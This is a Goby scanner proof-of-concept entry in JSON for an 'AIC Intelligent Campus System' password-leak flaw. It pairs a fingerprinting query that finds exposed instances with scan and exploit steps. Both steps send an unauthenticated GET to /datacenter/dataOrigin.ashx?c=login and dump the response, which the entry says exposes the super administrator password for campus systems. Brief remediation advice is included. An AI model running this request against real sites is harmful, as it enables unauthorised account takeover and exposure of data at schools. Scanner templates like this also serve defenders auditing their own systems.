Goby/json/AIC-Intelligent-Campus-Syst...

81 lines
2.0 KiB
JSON

{
"Name": "AIC Intelligent Campus System Password Leak",
"Description": "Divulge super administrator password",
"Product": "AIC智能校园系统",
"Homepage": "http://aic-it.com/",
"DisclosureDate": "2021-05-22",
"Author": "fengyue",
"GobyQuery": "title=\"AIC智能校园系统\"",
"Level": "2",
"Impact": "<p>Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.<br></p>",
"Recommandation": "<p><span style=\"color: var(--primaryFont-color);\">1. First, delete the leaked account password interface.</span><br></p><p>2. Contact the manufacturer to upgrade the system.</p><p>3. Modify the weak password.</p>",
"References": null,
"HasExp": true,
"ExpParams": [
{
"name": "查看",
"type": "input",
"value": "点击验证",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/datacenter/dataOrigin.ashx?c=login",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "卡号",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/datacenter/dataOrigin.ashx?c=login",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"Disclosure of Sensitive Information"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}